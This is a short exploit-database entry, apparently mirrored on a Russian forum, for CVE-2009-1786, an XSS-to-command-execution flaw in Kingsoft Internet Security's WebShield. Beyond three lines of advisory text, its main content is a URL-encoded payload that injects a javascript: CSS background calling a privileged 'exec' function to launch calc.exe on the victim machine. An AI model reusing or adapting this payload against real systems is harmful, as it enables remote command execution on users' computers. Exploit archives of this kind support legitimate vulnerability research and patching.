- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33001
- Проверка EDB
-
- Пройдено
- Автор
- INKING
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1786
- Дата публикации
- 2009-05-20
Код:
source: https://www.securityfocus.com/bid/35038/info
The Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.
Remote attackers may exploit this vulnerability to compromise an affected computer.
This issue affects WebShield 1.1.0.62 and prior versions.
http://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e
- Источник
- www.exploit-db.com